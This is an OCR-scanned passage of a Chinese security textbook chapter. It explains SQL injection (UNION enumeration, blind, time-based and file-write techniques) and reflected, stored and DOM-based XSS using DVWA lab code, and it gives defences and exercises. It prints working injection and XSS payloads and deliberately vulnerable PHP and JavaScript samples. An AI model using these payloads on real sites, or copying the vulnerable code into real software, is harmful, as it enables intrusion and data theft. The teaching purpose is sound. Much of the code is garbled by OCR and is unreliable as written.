要 的 限制 : 如 果 使 用 UNION 操作 符 组 合 两 个 查询 的 结果 ,两 个 查询 的 列 数 必须 相同 ,并 
且 每 一 列 的 数据 类 型 必须 相同 或 者 兼容 。 由 于 NULL 值 可 以 转换 成 任何 数据 类 型 , 它 常 
常 被 用 来 确定 查询 所 使 用 的 列 数 以 及 兼容 相应 列 的 数据 类 型 。 例 如 ,如 果 设 置 “id” 为 
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“1' union select null --”, 将 返回 错误 信息 
The used SELECT statements have a different number of columns 


如 果 设 置 为 "1' union select null,null --”, 程 序 将 不 会 返回 任何 错误 信息 ,这 就 表示 有 漏 
洞 的 查询 的 列 数 是 2, 攻 击 者 只 需要 继续 测试 每 个 列 的 数据 类 型 即 可 。 数 字 类 型 可 以 被 
隐 含 地 转换 为 字符 串 类 型 ,但 是 字符 串 类 型 转换 为 数字 类 型 常常 会 失败 ,图 13-24 使 用 的 
版 本 变量 *@@version” 也 可 以 用 来 测试 目标 列 是 否 是 数字 类 型 。 

3) 枚 举 数 据 库 模式 

大 型 数据 库 中 包含 大 量 数据 库 元 数据 ,可 以 查询 这 些 数 据 查 明 每 张 表 和 每 一 列 的 名 
称 。 如 图 13-25 所 示 ,通过 MySQL 的 “information_schema” 数 据 库 的 “tables” 表 , 即 可 获 
取 所 有 的 表 名 信息 。 


Vulnerability: SQL Injection 





User ID: 


ID: 1 union select table_nane, null from information_schena. tables 一 
First name: admin 
Surnane: adnin 


ID: 1 union select table_nane, null from information_schena tables 一 
First nane: CHARACTER_SETS 
Surname: 


ID: 1 union select table_nane, null from information_schena. tables 一 
First nane: COLLATIONS 
Surname: 


ID: 1 union select table name, null from information_schena. tables 一 
First name: COLLATION_CHARACTER_SET_APPLICABILITY 
Surname: 


TD: 1 union select table_nane, null from information_schena. tables 一 
First nane: COLUMNS 
Surname: 


ID: 1 union select table_ name, null from information schema. tables 一 
First name; COLUNMN_PRIVILEGES 


Surname: 





图 13-25 枚 举 数据 库 模式 示例 


4) SQL 盲 注 

使 用 UNION 注入 任意 查询 是 快速 提取 数据 的 方法 ,但 是 当 Web 程序 并 不 轻易 泄露 
数据 或 者 返回 详细 信息 时 ,攻击 者 往往 需要 通过 SQL 盲 注 进 行 推断 。 每 次 仅 获 取 少 量 信 
息 , 有 时 这 些 少量 信息 只 是 1 比特 信息 ,因为 盲 注 的 结果 只 有 “是 ”和 ”* 和 否 " 两 种 结果 。 即 便 
是 只 允许 提取 最 少量 数据 的 查询 ,它们 最 终 也 可 以 实现 极其 强大 的 功能 。 盲 注 包 括 基 于 
时 间 、 基 于 错误 和 基于 内 容 的 盲 注 。 图 13-26 给 出 DVWA 的 低 安全 性 育 注 代码 示例 ,如 
果 查 询 结 果 的 行 数 大 于 0 则 返回 “ID 存在 ”的 信息 ,否则 返回 “不 存在 ID”。 

(1) 使 用 基于 内 容 的 推断 方式 判定 后 台 查 询 的 列 数 可 以 采用 以 下 方式 : 

Oz 输入 “1 union select null” 返 回 “User ID is MISSING from the database.” 

@ 输入 “1' union select null,null” 返 回 “User ID exists in the database.” 
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<?php 
if( isset( $_GET[ 'Submit'] ) ){ 
$id = $_GET[ 'id']; 
$ getid = "SELECT first name, last_ name FROM users WHERE user id = '$ id';"; 
$result = mysqli query( $ GLOBALS["_ _ mysqli ston"], $ getid ); 
$num = @mysqli num rows( $ result ); // 不 再 返回 任何 的 错误 信息 
if( $num>0){ 


$html .= '<pre>User ID exists in the database.</pre>'; 
} 
else{ 
$html .= '<pre> User ID is MISSING from the database.</pre>'; 


} 


> 
图 13-26 DVWA 的 低 安 全 性 盲 注 代码 示例 


根据 返回 的 内 容 不 同 , 即 可 推断 出 列 数 为 2 。 

(2) 使 用 基于 错误 的 方式 可 以 判定 数据 库 中 的 某 个 条 件 是 否 满足 。 

输入 “1'and (select 1 where (condition) or 0 = 1/0) --”, 如 果 ”*condition” 被 满足 , 则 
程序 会 返回 “ID 存在 ”的 正确 结果 ,否则 会 执行 表达 式 *0 王 1/0”, 该 表达 式 存在 除 0 错 , 所 
以 程序 会 返回 “ID 不 存在 ”的 错误 结果 ,这 里 的 “condition” 可 以 是 任何 的 数据 库 查询 结果 
值 。 例 如 ,输入 “1'and (select 1 where (select 0) or 0 = 1/0) --” 将 返回 错误 结果 ,而 输 
人 “1'and (select 1 where (select 1) or 0 二 1/0) --” 将 返回 正确 结果 。 

(3) 使 用 sleep 函数 可 以 通过 响应 的 时 间 差 异 判 定 送 入 的 查询 是 否 满足 。 

输入 “1'and (select if (user() 一 'admin',l,sleep(10)))--”, 判 定 当前 用 户 是 否 是 
“admin”, 如 果 是 则 直接 返回 “ID 存在 ”的 结果 ,否则 Web 程序 会 执行 “sleep(10)” 函 数 ,等 
待 10s 后 再 应 答 ,攻击 者 可 以 根据 时 间 差 异 判定 请 求 查询 的 结果 是 “是 还是“ 否 ”。 

5) 带 外 攻击 

由 于 数据 库 服务 器 十 分 强大 ,除了 将 数据 查询 返回 给 用 户 之 外 ,还 有 许多 其 他 功能 ， 
例如 可 以 打开 额外 链接 访问 其 他 数据 库 , 可 以 执行 发 送 EMAL、 发 起 DNS 查询 、 发 起 
HTTP 连接 等 请 求 ,还 可 以 与 文件 系统 交互 ,所 有 的 这 些 功 能 都 对 攻击 者 非常 有 用 。 利 
用 数据 库 的 这 种 额外 功能 进行 注入 攻击 的 方式 称 为 “ 带 外 ”攻击 。 

MySQL 服务 器 允许 通过 “INTO OUTFILE” 和 “INTO DUMPFILE” 去 写 和 人 操作 系 
统 文件 ,但 是 用 户 需要 FILE 权限 才能 完成 。 输 入 示例 如 下 : 


1' union select table name, null from information_ schema. tables into outfile "test. txt” —— 


当 无 法 通过 正常 的 HTTP 响应 获得 查询 结果 时 ,攻击 者 可 以 利用 可 能 的 带 外 通道 获 
得 数据 。 

6) 条 件 语 句 

为 了 有 效 地 实现 盲 注 , 可 以 强迫 服务 器 执行 不 同 的 行为 并 根据 指定 的 条 件 返 回 不 同 
的 结果 ,从 而 提取 相应 的 比特 位 。 攻 击 者 可 以 使 用 查询 数据 的 特定 字 节 中 的 特定 比特 的 
值 作为 条 件 进行 攻击 ,MySQL 的 条 件 语句 格式 为 "SELECT if (布尔 表达 式 ,表达 式 1, 表 
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达 式 2)”。 例 如 ,使 用 以 下 输入 可 以 判定 当前 后 台 系 统 用户 是 不 是 “root”:“1'and (select 
if (user() 二 "root',0,1))--”, 如 果 返 回 正确 结果 表示 当前 用 户 是 root”, 攻 击 者 甚至 可 以 
使 用 类 似 “select if (substr(user() ,0,1) 二 'a' ,0,1)” 之 类 的 条 件 语 句 去 逐个 判断 当前 用 
户 的 具体 名 称 。 


13.5.2 防御 SQL 注入 


SQL 注入 漏洞 虽然 危害 较 大 ,但 它 是 最 容易 防御 的 Web 漏洞 之 一 。 只 要 在 编码 时 
采取 恰当 的 防御 机 制 , 基 本 上 可 以 杜绝 Web 程序 中 的 有 关 漏洞 。 

标准 的 SQL 安全 防御 机 制 如 图 13-27 的 DVWA 代码 所 示 。 

<?php 


if( isset( $_GET[ 'Submit'] ) ) { 
$id = $_GET[ 'id' ]; 


if(is numeric( $id )) { // 判 定 变量 类 型 
$data = $db—->prepare( 'SELECT first_name, last name FROM users WHERE user id = 
(:id) LIMIT 1;' ); // 设 置 参 数 化 查询 


$ data—>bindParam( ':id'，$ id, PDO: :PARAM_INT );  // 绑 定 变量 

$ data — > execute( ); 

if( $ data-> rowCount() == 1 ) {// 严 格 检查 查询 结果 的 行 数 
$html .= '<pre>User ID exists in the database.</pre>'; 

} 

else { 
header( $ _SERVER[ 'SERVER PROTOCOL' ] . '404 Not Found' ); 
$html . = '<pre>User ID is MISSING from the database.</pre>'; 


图 13-27 SQL 注入 防御 机 制 代码 示例 


(1) 确定 对 输入 的 变量 进行 确认 和 验证 ,检查 其 值 是 否 与 相应 列 的 类 型 匹配 。 

(2) 使 用 参数 化 查询 方式 分 两 个 步骤 建立 包含 输入 变量 的 SQL 语句 : 指定 SQL 
的 查询 结构 ,为 每 个 输入 变量 预 留 占 位 符 ; 四 指定 每 个 占 位 符 的 内 容 。 这 样 使 得 恶意 输 
人 无 法 破坏 在 步骤 四 中 指定 的 结构 ,所 以 恶意 输入 的 所 有 部 分 都 被 解释 为 数据 ,而 不 是 
SQL 语句 结构 的 一 部 分 。 

(3) 严格 检查 查询 结果 ,根据 SQL 操作 的 语义 确定 结果 的 行 数 是 否 与 预期 一 致 

需要 注意 的 是 , 占 位 符 必须 只 用 在 SQL 操作 的 数据 部 分 ,绝对 不 能 用 于 表示 SQL 语 
句 的 结构 ,如 表 名 、 列 名 或 者 其 他 SQL 关键 字 。 


13.6 Web 用户 的 安全 性 


13. 3 节 一 13.5 节 描 述 的 Web 程序 攻击 主要 以 服务 器 应 用 程序 为 目标 ,目的 是 执行 
非 授权 动作 或 者 非法 访问 数据 。 本 节 描 述 的 攻击 称 为 跨 站 脚本 攻击 (Cross Site Script， 


“eS 
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XSS) , 它 属 于 
程序 中 发 现 的 
演变 为 某 种 自 

XSS 漏洞 
介绍 这 三 种 不 


另外 一 种 类 型 ,因为 它 的 攻击 目标 是 Web 程序 的 其 他 用 户 。XSS 是 在 Web 
最 为 普遍 的 漏洞 , 它 常常 与 其 他 漏洞 一 起 造成 破坏 性 的 后 果 , 有 时 甚至 可 以 
我 繁殖 的 蠕虫。 

可 以 分 为 三 种 类 型 : 反射 型 持久 型 和 基于 DOM 的 XSS 漏洞 。 本 节 主 要 
同类 型 漏洞 的 产生 原因 、 攻 击 方法 和 防御 技术 。 


13.6.1 反射 型 XSS 
如 果 Web 程序 用 动态 页 面向 用 户 显 示 错 误 消 息 ,就 容易 造成 反射 型 XSS 漏洞 。 


图 13-28 给 出 
GET[' name' 


图 13-29( 
guofan” 的 页 面 


了 DVWA 项 目 中 低 安全 性 反射 型 漏洞 的 代码 示例 ,该 代码 接收 请 求 参 数 “_ 
J" 并 且 在 返回 页 面 中 直接 写 入 该 参数 的 值 。 


<?php 
if( array key exists( "name", $ _ GET ) && $ _GET[ 'name'] != NULL ) { 

// 将 用 户 的 输入 置 人 输出 页 面 

$html .= '<pre>Hello'. $_GET[ 'name' ] . '</pre>'; 
} 
?> 

图 13-28 DVWA 的 反射 型 XSS 代码 示例 

a) 给 出 了 正常 情况 下 的 输出 页 面 ,用 户 输入 “guofan”, Web 程序 返回 “Hello 


。 但 是 当 攻击 者 尝试 输入 “guofan </pre> < script > alert(XSS)</script >” 时 ， 


嵌 在 参数 “name” 中 的 脚本 被 客户 的 浏览 器 执行 ,弹出 消息 为 "1 的 对 话 框 。 


Vulnerability: Reflected Cross Site Scripting (XSS) Vulnerability: Reflected Cross Site Scripting (XSS) 



































Whatsyour name? guclan Submt Whafs your name? pre> eer ler ye" Ser 
lle prfm selle goofan Ez 
More Information 
More Information 全: 











(b) 


图 13-29 反射 型 XSS 攻击 示例 


大 概 3/4 的 XSS 漏洞 都 属于 反射 型 ,这 种 漏洞 之 所 以 称 为 反射 型 ,是 因为 攻击 者 必须 
设计 一 个 包含 嵌入 式 JavaScript 代码 的 请 求 , 然 后 这 些 代码 又 被 反射 回 提出 该 请 求 的 用 户 。 
反射 型 漏洞 的 攻击 代码 分 别 通过 一 个 单独 的 请 求 和 响应 进行 传送 ,有 时 也 称 为 一 阶 XSS。 

1. 攻击 方式 

反射 型 XSS 攻击 必须 诱 使 用 户 点 击 攻击 者 精心 设计 的 URL 地 址 才能 够 成 功 实施 ， 
攻击 方式 通常 包括 : 


外 该 测试 必须 关闭 下 浏览 器 的 默认 XSS 过 滤器 才能 成 功 执行 。 
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(1) 发 送 伪造 的 电子 邮件 ,里 面 附带 伪造 的 URL 链接 。 

(2) 在 QQ 或 微 信 等 即时 通信 程序 中 向 目标 用 户 提供 一 个 URL。 

(3) 在 自行 创建 的 站 点 或 者 第 三 方 站 点 发 布 恶意 的 URL。 

2. 反射 型 XSS 功能 

攻击 者 可 以 在 XSS 攻击 载荷 (payload) 中 提供 各 种 功能 ,常见 的 功能 包括 : 

(1) 窃取 用 户 的 会 话 令 牌 或 Cookie。 

(2) 注入 虚假 的 HTML 内 容 , 向 用 户 显 示 虚 假 信 息 ,也 称 为 虚拟 置换 (Virtual 
Defacement) 。 

(3) 注入 脚本 木马 。 

(4) 让 目标 用 户 代 蔡 攻 击 者 执行 非法 操作 或 远程 攻击 。 

(5) 直接 攻击 用 户 所 在 客户 端的 操作 系统 。 

3. 漏洞 利用 方法 

XSS 漏洞 的 可 利用 方法 非常 之 多 ,以 下 列 出 一 些 最 常见 的 方法 用 于 说 明 反射 型 XSS 
漏洞 危害 : 

(1) 脚本 标签 。 输 入 “< script > alert(1)</script >”, 结 果 如 图 13-29(b) 所 示 。 

(2) 事件 处 理 器 。 输 入 “< img src 二 1 onerror 二 alert(1)>”, 结 果 如 图 13-30 所 示 。 


Vulnerability: Reflected Cross Site Scripting (XSS) 








Whats your name? [Subma 














Hello 












More Information 





图 13-30 ”利用 事件 处 理 器 的 XSS 攻击 


(3) 脚本 伪 协 议 。 输 入 “< a href 王 ”javascript:alert(1)”> click here </a >” 将 生成 一 
个 链接 ,点击 该 链接 即 执行 脚本 “alert(1)”, 结 果 如 图 13-31 所 示 。 


Vulnerability: Reflected Cross Site Scripting (XSS) 








Whats your name? [iptonclick=alert(1) Scicj | Submit 

















Hello 












click 





More Information 


图 13-31 利用 脚本 伪 协 议 的 XSS 攻击 
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(4) 编码 输入 。 可 以 使 用 第 13. 2. 3 节 提 到 的 各 种 编码 方式 对 输入 进行 编码 ,例如 输 
入 “<img src 二 1 onerror 二 a 并 x6c;lert(1)”, 结 果 与 图 13-30 效果 相同 。 

4. 防御 技术 

从 概念 上 说 ,防御 XSS 攻击 十 分 困难 ,因为 任何 页 面 都 会 处 理 并 显示 用 户 数据 ,所 以 
很 难 确定 Web 程序 使 用 危险 方式 处 理 用 户 输入 的 所 有 情况 。 用 户 输入 未 经 适当 确认 与 
净化 就 被 复制 到 响应 页 面 中 ,这 是 反射 型 XSS 漏洞 的 根本 原因 。 因 此 ,首先 必须 确定 
Web 程序 中 用 户 输 入 被 复制 到 响应 页 面 的 每 种 情况 ,包括 请 求 中 提交 的 数据 、 之 前 输入 
保存 在 服务 器 端的 数据 和 带 外 通道 输入 的 数据 ,只 有 通过 仔细 审查 程序 代码 才能 确保 每 
种 情况 都 检查 到 。 然 后 ,需要 采取 一 种 三 重 防御 方法 : 确认 输入 .确认 输出 和 清除 危险 的 
插入 点 。 

(1) 确认 输入 : 如 果 Web 程序 在 某 个 位 置 收 到 的 用 户 数据 未 来 可 能 被 复制 到 响应 页 
面 ,那么 必须 对 它们 进行 尽 可 能 严格 的 确认 ,包括 限制 数据 长 度 、 限 制 允许 的 字符 集合 、 使 
用 正则 表达 式 限制 数据 的 内 容 。 

(2) 确认 输出 : Web 程序 必须 对 复制 到 响应 页 面 中 的 数据 的 每 个 字符 进行 HTML 
编码 ,以 净化 尽 可 能 多 的 恶意 字符 ,在 PHP 中 可 以 使 用 htmlspecialchars 函数 实现 。 

(3) 清除 危险 插入 点 : 尽量 避免 直接 在 现 有 JavaScript 中 插入 用 户 输 入 , 既 包 括 
< script > 标签 中 的 代码 ,也 包括 事件 处 理 器 中 的 代码 。 尽 量 避 人 免 在 标签 属性 的 URL 中 
嵌入 用 户 输入 ,尽量 避免 由 用 户 数据 控制 响应 页 面 的 编码 类 型 。 尽 量 使 用 白 名 单方 法 , 限 
制 响应 的 页 面 中 只 包含 预定 义 的 标签 名 字 和 属性 ,避免 提供 任何 引入 脚本 代码 的 机 会 。 


13.6.2 持久 型 XSS 


当 用 户 提交 的 数据 被 保存 在 Web 程序 的 数据 库 中 ,然后 不 经 适当 的 过 滤 或 净化 就 显 
示 给 其 他 用 户 ,此 时 就 会 出 现 持 久 型 XSS 漏洞 。 图 13-31 是 DVWA 项 目 中 的 低 安全 性 
持久 型 漏洞 代码 示例 ,代码 仅 对 输入 的 信息 进行 了 特殊 字符 处 理 ,用 于 避 开 SQL 注入 攻 
击 ,但 是 没有 对 输入 是 否 存在 HTML 标签 字符 进行 确认 ,攻击 者 可 以 在 “name” 或 者 
“message” 输 入 中 能 入 JavaScript 脚本 ,Web 程序 会 将 脚本 存 和 信 数据库, 然后 当 用 户 查 询 
数据 库 内 容 时 , 即 受到 持久 型 XSS 攻击 。 

通常 ,利用 持久 型 XSS 漏洞 需要 向 Web 程序 提出 至 少 两 个 请 求 ,在 第 一 个 请 求 中 舱 
和 人 恶意 代码 ,等待 Web 程序 接收 并 存储 这 些 代码 。 在 第 二 个 请 求 中 , 当 用 户 查 看 某 个 包含 
恶意 代码 的 页 面 ,恶意 代码 即 开始 执行 ,所 以 持久 型 XSS 攻击 也 称 为 二 阶 跨 站 脚本 攻击 。 

持久 型 XSS 攻击 与 反射 型 XSS 攻击 在 实施 时 存在 两 个 重要 的 区 别 : 

(1) 反射 型 XSS 攻击 要 求 诱 使 用 户 访问 某 个 专门 设计 的 URL 或 链接 ,而 持久 型 
XSS 攻击 不 需要 。 

(2) 持久 型 XSS 攻击 可 以 保证 , 当 用 户 受到 攻击 时 ,必然 正在 访问 Web 程序 ,因此 攻 
击 者 更 容易 实现 会 话 劫持 之 类 的 攻击 ; 而 反射 型 XSS 攻击 必须 诱导 用 户 登 录 并 点 击 某 
个 恶意 链接 才能 完成 攻击 。 

因此 ,持久 型 漏洞 带 来 的 威胁 更 为 严重 ,特别 是 如 果 受 攻击 用 户 是 管理 员 ,那么 攻击 
者 可 以 获得 管理 员 权 限 ,从 而 接管 Web 程序 。 
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针对 图 13-32 代码 的 攻击 示例 如 图 13-33 所 示 , 输 入 的 JavaScript 脚本 “< script > 
alert(1)</script >” 通 过 INSERT 操作 存 人 后 台数 据 库 的 “guestbook”, 当 其 他 用 户 查 询 该 
数据 库 的 消息 时 ,受到 持久 型 攻击 ,结果 如 图 13-34 所 示 , 浏 览 器 弹出 了 消息 为 “1” 的 对 
话 框 。 
<?php 
if( isset( $_POST[ 'btnSign'] ) ) { 
$message = trim( $_POST[ 'mtxMessage' ] ); // 获 取 用 户 输入 的 消息 文本 ,去掉 多 余 空 格 
$name = trim( $_POST[ 'txtName' ] ); // 获 取 用 户 输入 的 消息 标题 
$ message = stripslashes( $ message ); // 删 除 消息 中 的 反 斜 杠 
// 清 除 \x00，\x0d, \x0av 单 引号 、 双 引号 和 反 斜 杠 等 字符 
$ message = mysqli real escape string( $ GLOBALS["” _ mysqli ston"], $ message ); 
$name = mysqli real escape_string( $ GLOBALS["” _mysqli_ston"], $ name ); 
// 把 消息 插入 数据 库 
$ query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$ message', '$ name' );"; 
$result = mysqli query( $ GLOBALS[" _ mysqli ston"], $ query ); 


图 13-32 DVWA 低 安全 性 持久 型 漏洞 代码 示例 


Vulnerability: Stored Cross Site Scripting (XSS) ei 
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图 13-34 ”持久 型 攻击 结果 示例 
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反射 型 XSS 的 功能 、 漏 洞 方法 和 防御 技术 都 适用 于 持久 型 攻击 ,但 是 持久 型 XSS 的 
攻击 方式 与 反射 型 XSS 的 有 较 大 区 别 , 可 以 分 为 带 内 和 带 外 攻击 方式 。 

带 内 攻击 适用 于 大 多 数 情 况 ,类 似 图 13-33 的 攻击 方式 ,将 漏洞 数据 通过 Web 界面 
提交 。 存 在 漏洞 的 可 能 位 置 包括 : 

(1) 个 人 信息 字段 ,如 姓名 、 地 址 、 邮 件 电话 等 ; 

(2) 文档 、 上 传 文件 和 其 他 数据 的 名 称 ; 

(3) 提交 给 管理 员 的 问题 或 反馈 等 

(4) 向 其 他 用 户 传送 的 消息 注释、 问题 等 ; 

(5) 记录 在 日 志 中 并 且 可 能 显示 给 管理 员 的 任何 内 容 , 如 URL、 用 户 名 、Referer 和 
User-Agent 等 ; 

(6) 用 户 之 间 共 享 的 上 传 文件 内 容 。 

攻击 者 只 需要 在 上 述 位 置 提交 恶意 代码 ,然后 等 待 用 户 查 看 有 关内 容 , 就 可 以 发 起 持 
久 型 攻击 。 

带 外 攻击 适用 于 通过 其 他 渠道 向 Web 程序 提交 漏洞 数据 的 情况 , Web 程序 通过 其 
他 渠道 接收 数据 ,并 在 最 终生 成 的 页 面 中 显示 。 例 如 ,攻击 者 可 以 向 某 个 邮件 服务 器 发 送 
包含 恶意 代码 的 邮件 ,然后 等 待 用 户 查看 该 邮件 ,并 以 HTML 格式 显示 邮件 内 容 。 

针对 图 13-33 攻击 的 防御 代码 如 下 所 示 ,额外 增加 htmlspecialchars 函数 过 滤 消 息 中 
的 可 能 XSS 攻击 字符 即 可 : 

$message = stripslashes( $ message ); 


$message = mysqli real escape string( $ GLOBRLS[" _mysqli ston"], $ message ); 
$message = htmlspecialchars( $ message ); // 净 化 所 有 XSS 的 危险 字符 


13.6.3 基于 DOM 的 XSS 


反射 型 和 持久 型 XSS 存在 共同 的 行为 模式 : Web 程序 提取 用 户 的 恶意 输入 并 且 以 
危险 方式 将 这 些 输入 返回 给 用 户 。 基 于 DOM 的 XSS 没有 这 种 特点 ,攻击 者 的 脚本 通过 
以 下 过 程 执行 : 

(1) 攻击 者 设计 一 个 包含 嵌入 式 JavaScript 脚本 的 恶意 URL, 诱 使 用 户 点 击 ; 

(2) 服务 器 的 响应 中 不 包含 攻击 者 嵌入 的 脚本 ; 

(3) 当 用 户 的 浏览 器 处 理 该 响应 时 ,脚本 被 执行 。 
因为 客户 端 JavaScript 可 以 访问 浏览 器 的 文本 对 象 模型 DOM, 它 可 以 决定 如 何 加 载 
当前 页 面 的 URL。 当 Web 程序 发 布 的 脚本 可 以 从 URL 中 提取 数据 ,然后 对 这 些 数 据 进 
行 处 理 并 更 新 页 面 内 容 时 ,Web 程序 就 容易 受到 基于 DOM 的 XSS 的 攻击 。 

图 13-35 给 出 了 DVWA 项 目 基于 DOM 的 XSS 攻击 代码 示例 ,该 代码 在 处 理 URL 
中 的 “default” 参 数 时 存在 漏洞 ,“default” 参 数 用 于 描述 页 面 显 示 的 语言 是 英语 还 是 其 他 
语言 ,但 是 Web 程序 没有 对 该 参数 做 任何 输入 确认 操作 ,在 返回 给 用 户 的 响应 中 调用 
URL 解码 对 该 参数 值 进行 解码 ,并 使 用 解码 后 的 值 动态 更 新 页 面 内 容 。 攻 击 者 只 需要 精 
心 设计 “default” 参 数 , 即 可 成 功 实施 攻击 ,如 图 13-36 所 示 。 需 要 指出 的 是 ,在 返回 给 浏 
览 器 的 页 面 内 容 中 ,并 没有 包含 攻击 者 在 输入 中 设计 的 JavaScript 脚本 。 
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< form name = "XSS" method = "GET"> 
< select name = "default"> 
< script> 
if (document. location. href. indexOf("default =") >= 0) { 
var lang = document. location. href. substring 
(document. location. href. indexOf ("default = ") +8); 
document. write("< option value= '" + lang + "'>" + $decodeURI(lang) + "</ 
option >"); 
document. write("< option value = '' disabled = 'disabled'> ---- </option >"); 
} 
document. write( "< option value = 'English'> English </option >"); 
document. write("< option value = 'French'> French </option>"); 




















</script> 
</select > 
< input type= "submit" value = "Select" /> 
</form> 

图 13-35 DVWA 项 目 基于 DOM 的 XSS 漏洞 代码 示例 
s/xss_d/?default=English<script>alert(1)</script> 设计 恶意 default 参 数值 

127.0.01 显示 : 四 

1 庶 入 的 脚本 被 成 功 执行 

Lm | 
目 Vi te Scripting (XSS) 
国 Please choose a language 
English || Select | 

| | 
时 More Information 


图 13-36 基于 DOM 的 XSS 攻击 结果 


基于 DOM 的 XSS 的 攻击 方式 、 功 能 和 漏洞 利用 方式 与 反射 型 XSS 基本 一 致 ,但 是 
反射 型 XSS 的 防御 技术 并 不 适用 于 基于 DOM 的 XSS, 因 为 它 不 需要 将 用 户 控制 的 输入 
复制 到 服务 器 响应 中 。 

Web 程序 应 该 尽量 避免 使 用 JavaScript 处 理 DOM 数据 并 搬入 页 面 中 ,如 果 无 法 避 
免 ,通常 使 用 两 种 方法 防止 基于 DOM 的 XSS 漏洞 。 

1. 输入 确认 

Web 程序 对 需要 处 理 的 数据 进行 严格 确认 ,使 用 客户 端 确认 比 在 服务 器 端 进行 确认 
更 加 有 效 。 例 如 ,可 以 在 图 13-35 的 代码 中 增加 确认 代码 ,净化 “default” 参 数 的 值 ; 也 可 
以 在 服务 器 端 对 URL 数据 进行 严格 的 确认 ,实施 深层 防御 ,检测 恶意 请 求 。 

2. 确认 输出 

与 防御 反射 型 XSS 相同 ,在 用 户 可 控 的 DOM 数据 插入 页 面 之 前 , Web 程序 也 可 以 
对 它们 进行 htmlspecialchars 编码 ,从 而 将 各 种 危险 的 字符 以 安全 方式 显示 在 页 面 中 。 
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13.7 小 结 


几乎 所 有 的 Web 程序 都 存在 相似 的 安全 问题 ,采用 相同 的 核心 安全 机 制 , 只 是 实现 
的 形式 存在 巨大 差异 。 处 理 用 户 访 问 和 用 户 输入 的 安全 机 制 最 为 重要 ,它们 是 攻击 者 的 
主要 攻击 对 象 ,一旦 被 攻破 ,攻击 者 就 可 以 访问 其 他 用 户 数据 或 者 执行 任意 代码 。 

HTTP 协议 的 请 求 消息 头 部 、 响 应 消息 头 部 ,Cookie 属性 .HTTP 方法 和 状态 码 等 内 
容 与 Web 程序 安全 密切 相关 ,Web 程序 采用 的 服务 端 技 术 和 客户 端 技术 也 是 影响 Web 
程序 安全 的 重要 因素 。Web 程序 可 以 采用 URL 编码 .Unicode 编码 和 HTML 编码 等 各 
种 编码 方式 对 数据 进行 处 理 , 如 果 编 码 方案 使 用 不 当 , 很 容易 产生 安全 漏洞 。 

Web 程序 的 攻击 手段 多 种 多 样 ,本 章 着 重 介绍 了 验证 机 制 、 会 话 管理 .SQL 注入 和 
XSS 攻击 4 种 较 常 见 的 攻击 方式 ,详细 描述 各 类 漏洞 的 产生 原因 、 利 用 方式 和 对 应 的 防 
御 手 段 。 攻 击 者 还 可 以 对 Web 程序 展开 其 他 攻击 手段 ,如 跨 站 伪造 请 求 攻击 (CSRF)、 路 
径 包 含 . 文 件 包含 ,命令 注入 等 ,有 兴趣 的 读者 可 以 进一步 阅读 参考 文献 中 的 有 关 资 料 。 


习 题 


13-1 简 述 黑 名 单 和 白 名 单 的 作用 和 限制 。 

13-2 某 种 输入 确认 机 制 为 了 防御 跨 站 脚本 攻击 ,采用 下 列 顺序 处 理 输 入 : 
(1) 删除 < script > 表达 式 ; 

(2) 删除 输入 中 的 引号 ; 

(3) 对 输入 进行 HTML 解码 ; 

(4) 如 果 任 何 输入 项 被 删除 ,返回 步骤 (1) 。 

如 何 编码 下 列 输入 ,使 得 它 可 以 让 数据 通过 确认 ? 


">< script> alert("foo")</script> 


13-3 在 测试 使 用 账号 "fguo” 和 密码 “pass” 登 录 某 个 Web 程序 的 过 程 中 ,在 登录 阶 
段 , 从 拦截 代理 上 看 到 一 个 要 求 访问 如 下 URL 的 HTTP 请 求 : 





http://www. test. com/app?action = login&uname = fguogpassword = pass 


攻击 者 可 以 确定 哪些 缺陷 ? 

13-4 一 个 多 阶段 登录 机 制 要 求 用 户 首先 提交 用 户 名 ,然后 在 后 续 阶 段 中 提交 其 他 
认证 信息 。 如 果 用 户 提交 任何 无 效 的 数据 ,立即 返回 第 一 阶段 。 这 种 机 制 存在 什么 缺点 ? 
如 何 修复 漏洞 ? 

13-5 Web 程序 在 登录 功能 中 整合 了 反 钓鱼 机 制 , 注 册 时 ,用 户 从 Web 程序 提供 的 
大 量 图 片 中 选择 一 幅 特殊 的 图 片 。 登 录 机 制 由 以 下 步骤 组 成 : 

(1) 用 户 输入 账号 名 称 和 生日 。 

(2) 如 果 信 息 无 误 , Web 程序 向 用 户 显示 他 们 选择 的 图 片 ,如 果 信 息 有 误 , 则 随机 显 
示 一 幅 图 片 。 
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(3) 用 户 核实 图 片 ,如 果 图 片 正确 , 则 输入 密码 登录 。 


反 钓 鱼 机 制 的 作用 在 于 向 用 户 确认 ,他 们 使 用 的 是 真实 的 程序 而 不 是 钓鱼 程序 ,因为 
真正 的 程序 才 会 显示 正确 的 图 片 。 该 机 制 给 登录 功能 造成 什么 漏洞 ? 能 够 有 效 阻 止 钓鱼 
攻击 吗 ? 

13-6 登录 某 个 Web 程序 后 ,服务 器 建立 以 下 Cookie: 


Set - Cookie: sess = abl12345f7ed; 


单 击 “ 退 出 ”按钮 后 ,Web 程序 执行 以 下 客户 端 脚 本 : 


document, cookie = "sess = "; document. location = "/"; 


你 从 Web 程序 的 这 种 实现 方式 可 以 得 出 什么 结论 ? 

13-7 ”登录 某 个 Web 程序 后 ,服务 器 建立 以 下 Cookie: 

Set-Cookie: sessid = 23VvZmFuOjIwMTcwODEzMTUwMjAxMTE = ; 

过 了 1lh 后 ,再 次 登录 获得 以 下 Cookie: 

Set-Cookie: sessid = Z3VvZmFuOjIwMTcwODEZzMTQwMjAwMDA = ; 

通过 这 两 个 Cookie 值 ,你 可 以 得 出 什么 结论 ? 

13-8 在 登录 功能 中 发 现 一 个 SQL 注入 漏洞 ,试图 使 用 输入 “'or 1 二 1 --” 避 开 登 录 ， 
但 是 攻击 失败 ,生成 的 错误 消息 表明 “--" 字 符 串 被 Web 程序 的 过 滤 机 制 删除 了 。 如 何 解 
决 这 个 问题 ? 

13-9 如 果 要 使 用 UNION 操作 符 获取 数据 ,但 是 不 知道 最 初 的 查询 返回 的 列 数 ,如 
何 查 明 该 列 值 ? 

13-10 已 经 发 现 一 个 SQL 注入 漏洞 ,但 是 Web 程序 不 允许 输入 中 包含 任何 空白 字 
符 , 如 何 解除 这 种 限制 ? 

13-11 Web 程序 过 滤 在 输入 中 出 现 的 单 引 号 。 假 设 在 某 个 数字 字段 中 发 现 注 入 漏 
洞 ,但 是 在 攻击 时 需要 使 用 某 个 字符 串 值 ,如 何 解决 ? 

13-12 在 Web 程序 行为 中 ,有 什么 明显 特征 可 以 用 于 确定 大 多 数 XSS 漏洞 ? 
